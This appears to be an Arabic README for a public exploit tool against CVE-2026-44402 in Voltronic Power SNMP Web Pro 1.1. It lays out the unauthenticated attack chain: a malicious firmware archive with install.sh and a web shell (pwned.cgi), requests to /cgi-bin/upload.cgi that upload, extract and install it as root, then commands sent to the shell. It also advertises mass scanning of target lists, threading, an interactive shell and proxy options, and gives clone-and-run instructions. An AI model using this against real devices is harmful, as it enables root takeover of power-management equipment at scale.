
استغلال لثغرة CVE-2026-44402 تستهدف Voltronic Power SNMP Web Pro 1.1، مما يتيح تنفيذ أوامر عن بُعد دون مصادقة عبر رفع برنامج ثابت خبيث. يدعم الفحص لهدف واحد أو فحص جماعي مع قشرة تفاعلية.
ثغرة حرجة لتنفيذ الأوامر عن بُعد دون مصادقة (CVSS 9.8) — Voltronic Power SNMP Web Pro 1.1
تستغل هذه الأداة CVE-2026-44402، وهي ثغرة في جهاز Voltronic Power SNMP Web Pro 1.1 تسمح لـالمهاجمين غير المصادق عليهم برفع أرشيف برنامج ثابت خبيث وتنفيذ أوامر النظام بصلاحيات الجذر (root) عبر نقطة النهاية upload.cgi.
| الخاصية | القيمة |
|---|
| معرف CVE | CVE-2026-44402 |
| درجة CVSS | 9.8 (حرجة) |
| CWE | CWE-434 — رفع ملف غير مقيد بنوع خطير |
| المنتج المتأثر | Voltronic Power SNMP Web Pro 1.1 |
| المصادقة المطلوبة | لا (غير مصادق عليها) |
| ناقل الهجوم | قائم على الشبكة (عن بُعد) |
| الصلاحيات | تنفيذ أوامر بمستوى الجذر |
توجد الثغرة في وظيفة تحديث البرنامج الثابت (upload.cgi). نقطة النهاية:
إنشاء أرشيف خبيث
upgrade/install.sh — سكربت التثبيتupgrade/pwned.cgi — قشرة ويبرفع الأرشيف ← POST /cgi-bin/upload.cgi?name=upgrade&?params=upload
"ACK" إذا نجحت العمليةاستخراج الأرشيف ← GET /cgi-bin/upload.cgi?name=upgrade&?params=extract
"ACK" إذا نجحت العمليةالتثبيت ← GET /cgi-bin/upload.cgi?name=upgrade&?params=install
install.sh بصلاحيات الجذر"ACK" إذا نجحت العمليةتفعيل قشرة الويب ← POST /cgi-bin/pwned.cgi
cmd ← تنفيذ أوامر عن بُعد! 🚀-u)-f targets.txt)-t 20) — معالجة متوازية سريعة--shell) مع دعم cdurl | output--proxy)--timeout)-v) لتصحيح الأخطاءrequests و prompt_toolkit# استنساخ المستودع
git clone https://github.com/0xCyp1337/CVE-2026-44402.git
cd CVE-2026-44402
python3 CVE-2026-44402.py